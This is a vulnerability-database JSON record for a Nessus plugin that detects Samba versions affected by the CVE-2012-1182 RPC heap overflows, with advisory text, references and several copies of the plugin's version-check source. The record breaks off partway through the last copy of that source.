{"id": "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "bulletinFamily": "scanner", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "description": "According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.", "published": "2012-04-11T00:00:00", "modified": "2020-04-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/58662", "reporter": "This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "https://www.zerodayinitiative.com/advisories/ZDI-12-068/", "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "https://www.samba.org/samba/history/security.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "https://www.samba.org/samba/history/samba-3.6.4.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-071/", "https://www.samba.org/samba/security/CVE-2012-1182.html", "https://www.samba.org/samba/history/samba-3.4.16.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-070/", "https://www.samba.org/samba/history/samba-3.5.14.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-069/", "https://www.zerodayinitiative.com/advisories/ZDI-12-061/"], "cvelist": ["CVE-2012-1182"], "type": "nessus", "lastseen": "2020-04-01T02:36:52", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:samba:samba"], "cvelist": ["CVE-2012-1182"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss3": {}, "description": "According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.", "edition": 15, "enchantments": {"dependencies": {"modified": "2020-03-18T02:46:02", "references": [{"idList": ["NMAP:SAMBA-VULN-CVE-2012-1182.NSE"], "type": "nmap"}, {"idList": ["CESA-2013:0515", "CESA-2012:0466", "CESA-2012:0465", "CESA-2013:0506"], "type": "centos"}, {"idList": ["RHSA-2012:0466", "RHSA-2013:0506", "RHSA-2012:0465", "RHSA-2012:0478", "RHSA-2013:0515"], "type": "redhat"}, {"idList": ["SOL13719", "F5:K13719"], "type": "f5"}, {"idList": ["USN-1423-1"], "type": "ubuntu"}, {"idList": ["CVE_2012_1182", "CVE_2012_1182_NONX"], "type": "canvas"}, {"idList": ["SAMBA:CVE-2012-1182"], "type": "samba"}, {"idList": ["ELSA-2012-0478", "ELSA-2012-0466", "ELSA-2013-0506", "ELSA-2013-0515", "ELSA-2012-0465"], "type": "oraclelinux"}, {"idList": ["ORACLELINUX_ELSA-2013-0515.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "OPENSUSE-2012-224.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "DEBIAN_DSA-2450.NASL", "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "ORACLELINUX_ELSA-2012-0466.NASL", "FEDORA_2012-5805.NASL", "SOLARIS11_SAMBA_20121016.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:VULN:12426", "SECURITYVULNS:DOC:28165", "SECURITYVULNS:VULN:12328"], "type": "securityvulns"}, {"idList": ["BAF37CD2-8351-11E1-894E-00215C6A37BB"], "type": "freebsd"}, {"idList": ["EDB-ID:21850"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:116953", "PACKETSTORM:116843"], "type": "packetstorm"}, {"idList": ["DEBIAN:BSA-070:68853", "DEBIAN:DSA-2450-1:77F45"], "type": "debian"}, {"idList": ["ZDI-12-072", "ZDI-12-071", "ZDI-12-063", "ZDI-12-061", "ZDI-12-062", "ZDI-12-070", "ZDI-12-069", "ZDI-12-064"], "type": "zdi"}, {"idList": ["SSV:60050"], "type": "seebug"}, {"idList": ["SUSE-SU-2012:0500-1", "OPENSUSE-SU-2012:0508-1", "SUSE-SU-2012:0501-1", "SUSE-SU-2012:0501-2", "SUSE-SU-2012:0504-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310840980", "OPENVAS:1361412562310870928", "OPENVAS:1361412562310123695", "OPENVAS:864213", "OPENVAS:1361412562310870581", "OPENVAS:1361412562310864238", "OPENVAS:840980", "OPENVAS:1361412562310870935", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310123940"], "type": "openvas"}, {"idList": ["CVE-2012-1182"], "type": "cve"}]}, "score": {"modified": "2020-03-18T02:46:02", "value": 9.3, "vector": "NONE"}}, "hash": "ce9c8c644614249c7971c4d743d3677e4f2af532b3fe7f56f656434559ca56ae", "hashmap": [{"hash": "82eaa057c710e8f441190b3383e9ae3a", "key": "cpe"}, {"hash": "af24fd3fdacb4d500ae9d1e724743016", "key": "modified"}, {"hash": "05eadc1d06d957176715d848b4e3f7f7", "key": "published"}, {"hash": "e7babc75e3803ae6c6947a5a8ba9ce96", "key": "href"}, {"hash": "f988dc6e0b4d047c838adcca890ea132", "key": "naslFamily"}, {"hash": "324ed8dd90f32656500027003742bd7b", "key": "reporter"}, {"hash": "4391399f27f142b79b2b7262b6666d67", "key": "description"}, {"hash": "9c2f905a32e078eb0883870780f7c314", "key": "references"}, {"hash": "421e24a53386c440ab62d84e440cbecc", "key": "sourceData"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "470fe954b680cf02b4ca3137595cc603", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8bc38ebaf3bd93e6fed4f49988ea97f1", "key": "title"}, {"hash": "c402e9ff9af6dcede82ea5d809541d8e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/58662", "id": "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "lastseen": "2020-03-18T02:46:02", "modified": "2020-03-02T00:00:00", "naslFamily": "Misc.", "objectVersion": "1.3", "pluginID": "58662", "published": "2012-04-11T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "https://www.zerodayinitiative.com/advisories/ZDI-12-068/", "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "https://www.samba.org/samba/history/security.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "https://www.samba.org/samba/history/samba-3.6.4.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-071/", "https://www.samba.org/samba/security/CVE-2012-1182.html", "https://www.samba.org/samba/history/samba-3.4.16.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-070/", "https://www.samba.org/samba/history/samba-3.5.14.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-069/", "https://www.zerodayinitiative.com/advisories/ZDI-12-061/"], "reporter": "This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58662);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"ZDI\", value:\"ZDI-12-061\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-062\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-063\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-064\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-068\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-069\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-070\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-071\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-072\");\n\n script_name(english:\"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of Samba\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple buffer overflow\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install the appropriate patch referenced in the project's\nadvisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-061/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-062/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-063/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-064/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-068/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-069/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-070/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-071/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-072/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-1182.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.6.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.5.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.4.16.html\");\n # Patch links\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/security.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_kb_item(\"SMB/transport\");\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\nif (\"Samba \" >!< lanman) exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\nversion = lanman - 'Samba ';\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Patches have been released for 3.x < 3.4, but \n# those patches do not change the version number\nif (\n (ver[0] == 3 && ver[1] < 4) ||\n (ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||\n (ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||\n (ver[0] == 3 && ver[1] == 6 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version + \n '\\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Samba\", version);\n", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "type": "nessus", "viewCount": 15}, "differentElements": ["modified"], "edition": 15, "lastseen": "2020-03-18T02:46:02"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:samba:samba"], "cvelist": ["CVE-2012-1182"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-01-16T20:13:37", "references": [{"idList": ["NMAP:SAMBA-VULN-CVE-2012-1182.NSE"], "type": "nmap"}, {"idList": ["MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP"], "type": "metasploit"}, {"idList": ["CESA-2013:0515", "CESA-2012:0466", "CESA-2012:0465", "CESA-2013:0506"], "type": "centos"}, {"idList": ["RHSA-2012:0466", "RHSA-2013:0506", "RHSA-2012:0465", "RHSA-2012:0478", "RHSA-2013:0515"], "type": "redhat"}, {"idList": ["SOL13719", "F5:K13719"], "type": "f5"}, {"idList": ["USN-1423-1"], "type": "ubuntu"}, {"idList": ["SECURITYVULNS:DOC:28165", "SECURITYVULNS:VULN:12328"], "type": "securityvulns"}, {"idList": ["SUSE-SU-2012:0500-1", "OPENSUSE-SU-2012:0508-1", "SUSE-SU-2012:0501-1", "SUSE-SU-2012:0501-2"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310831574", "OPENVAS:864213", "OPENVAS:1361412562310123690", "OPENVAS:1361412562310870581", "OPENVAS:1361412562310850289", "OPENVAS:870935", "OPENVAS:136141256231071254", "OPENVAS:850289", "OPENVAS:1361412562310870935", "OPENVAS:881179"], "type": "openvas"}, {"idList": ["ZDI-12-072", "ZDI-12-068", "ZDI-12-071", "ZDI-12-061", "ZDI-12-062", "ZDI-12-070", "ZDI-12-069"], "type": "zdi"}, {"idList": ["BAF37CD2-8351-11E1-894E-00215C6A37BB"], "type": "freebsd"}, {"idList": ["PACKETSTORM:116953", "PACKETSTORM:116843"], "type": "packetstorm"}, {"idList": ["DEBIAN:BSA-070:68853", "DEBIAN:DSA-2450-1:77F45"], "type": "debian"}, {"idList": ["CVE_2012_1182_NONX"], "type": "canvas"}, {"idList": ["SSV:60050"], "type": "seebug"}, {"idList": ["FEDORA_2012-5793.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0465.NASL", "CENTOS_RHSA-2012-0466.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "SUSE_11_CIFS-MOUNT-120411.NASL", "DEBIAN_DSA-2450.NASL", "REDHAT-RHSA-2013-0515.NASL", "FEDORA_2012-6382.NASL", "SOLARIS11_SAMBA_20121016.NASL"], "type": "nessus"}, {"idList": ["ELSA-2012-0478", "ELSA-2012-0466", "ELSA-2013-0506", "ELSA-2012-0465"], "type": "oraclelinux"}, {"idList": ["CVE-2012-1182"], "type": "cve"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "ac45767eda8d50507e02d45ff770ce268152e8a05cf3884d2d9addf6513a5af1", "hashmap": [{"hash": "82eaa057c710e8f441190b3383e9ae3a", "key": "cpe"}, {"hash": "05eadc1d06d957176715d848b4e3f7f7", "key": "published"}, {"hash": "f988dc6e0b4d047c838adcca890ea132", "key": "naslFamily"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "4391399f27f142b79b2b7262b6666d67", "key": "description"}, {"hash": "9c2f905a32e078eb0883870780f7c314", "key": "references"}, {"hash": "421e24a53386c440ab62d84e440cbecc", "key": "sourceData"}, {"hash": "470fe954b680cf02b4ca3137595cc603", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8bc38ebaf3bd93e6fed4f49988ea97f1", "key": "title"}, {"hash": "0395c233485fa30e0688fdf763864504", "key": "href"}, {"hash": "c402e9ff9af6dcede82ea5d809541d8e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=58662", "id": "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "lastseen": "2019-01-16T20:13:37", "modified": "2018-11-15T00:00:00", "naslFamily": "Misc.", "objectVersion": "1.3", "pluginID": "58662", "published": "2012-04-11T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "https://www.zerodayinitiative.com/advisories/ZDI-12-068/", "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "https://www.zerodayinitiative.com/advisories/ZDI-12-072/", "https://www.samba.org/samba/history/security.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "https://www.samba.org/samba/history/samba-3.6.4.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-071/", "https://www.samba.org/samba/security/CVE-2012-1182.html", "https://www.samba.org/samba/history/samba-3.4.16.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-070/", "https://www.samba.org/samba/history/samba-3.5.14.html", "https://www.zerodayinitiative.com/advisories/ZDI-12-069/", "https://www.zerodayinitiative.com/advisories/ZDI-12-061/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58662);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"ZDI\", value:\"ZDI-12-061\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-062\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-063\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-064\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-068\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-069\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-070\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-071\");\n script_xref(name:\"ZDI\", value:\"ZDI-12-072\");\n\n script_name(english:\"Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows\");\n script_summary(english:\"Checks version of Samba\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Samba server is affected by multiple buffer overflow\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Samba 3.x running on the\nremote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is,\ntherefore, affected by multiple heap-based buffer overflow\nvulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling\ncode it generates to contain multiple heap-based buffer overflow\nvulnerabilities. This generated code can allow a remote,\nunauthenticated attacker to use malicious RPC calls to crash the\napplication and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or\notherwise determine if one of the associated patches has been\napplied.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install the appropriate patch referenced in the project's\nadvisory or upgrade to 3.6.4 / 3.5.14 / 3.4.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-061/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-062/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-063/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-064/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-068/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-069/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-070/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-071/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-072/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/security/CVE-2012-1182.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.6.4.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.5.14.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/samba-3.4.16.html\");\n # Patch links\n script_set_attribute(attribute:\"see_also\", value:\"https://www.samba.org/samba/history/security.html\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\", \"SMB/samba\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n\nport = get_kb_item(\"SMB/transport\");\n\nlanman = get_kb_item_or_exit(\"SMB/NativeLanManager\");\nif (\"Samba \" >!< lanman) exit(0, \"The SMB service listening on port \"+port+\" is not running Samba.\");\n\nversion = lanman - 'Samba ';\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Patches have been released for 3.x < 3.4, but \n# those patches do not change the version number\nif (\n (ver[0] == 3 && ver[1] < 4) ||\n (ver[0] == 3 && ver[1] == 4 && ver[2] < 16) ||\n (ver[0] == 3 && ver[1] == 5 && ver[2] < 14) ||\n (ver[0] == 3 && ver[1] == 6 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version + \n '\\n Fixed version : 3.6.4 / 3.5.14 / 3.4.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Samba\", version);\n", "title": "Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows", "type": "nessus", "viewCount": 6}, "differentElements": ["description"], "edition": 8, "lastseen": "2019-01-16T20:13:37"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:samba:samba"], "cvelist": ["CVE-2012-1182"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to its banner, the version of Samba 3.x running on the remote host is earlier than 3.6.4 / 3.5.14 / 3.4.16. It is, therefore, affected by multiple heap-based buffer overflow vulnerabilities. \n\nAn error in the DCE/RPC IDL (PIDL) compiler causes the RPC handling code it generates to contain multiple heap-based buffer overflow vulnerabilities. This generated code can allow a remote, unauthenticated attacker to use malicious RPC calls to crash the application and possibly execute arbitrary code as the root user. \n\nNote that Nessus has not actually tried to exploit this issue or otherwise determine if one of the associated patches has been applied.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "037415a5af1777bdc97f43f358d74de03df5fac1f728dfd4e495d6f540ab5f10", "hashmap": [{"hash": "82eaa057c710e8f441190b3383e9ae3a", "key": "cpe"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "05eadc1d06d957176715d848b4e3f7f7", "key": "published"}, {"hash": "f988dc6e0b4d047c838adcca890ea132", "key": "naslFamily"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "fcdc16f45a8b3275fabc0a95bf04f532", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "30198047c9da0c07c57bf18f3c737e34", "key": "references"}, {"hash": "470fe954b680cf02b4ca3137595cc603", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8bc38ebaf3bd93e6fed4f49988ea97f1", "key": "title"}, {"hash": "66248eddd43d682ec5d179e78435c03c", "key": "description"}, {"hash": "0395c233485fa30e0688fdf763864504", "key": "href"}, {"hash": "c402e9ff9af6dcede82ea5d809541d8e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=58662", "id": "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "lastseen": "2018-07-30T13:41:18", "modified": "2018-07-27T00:00:00", "naslFamily": "Misc.", "objectVersion": "1.3", "pluginID": "58662", "published": "2012-04-11T00:00:00", "references": ["http://www.zerodayinitiative.com/advisories/ZDI-12-064/", "http://www.zerodayinitiative.com/advisories/ZDI-12-062/", "http://www.zerodayinitiative.com/advisories/ZDI-12-069/", "http://www.samba.org/samba/history/samba-3.6.4.html", "http://www.zerodayinitiative.com/advisories/ZDI-12-071/", "http://www.zerodayinitiative.com/advisories/ZDI-12-061/", "http://www.zerodayinitiative.com/advisories/ZDI-12-068/", "http://www.zerodayinitiative.com/advisories/ZDI-12-070/", "https://www.samba.org/samba/security/CVE-2012-1182.html", "http://www.samba.org/samba/history/samba-3.5.14.html", "http://www.zerodayinitiative.com/advisories/ZDI-12-072/", "http://www.samba.org/samba/history/security.html", "http://www.samba.org/samba/history/samba-3.4.16.html", "http://www.zerodayinitiative.com/advisories/ZDI-12-063/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58662);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/27 18:38:14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"ZDI\", value:\"ZDI-12-061\");\n 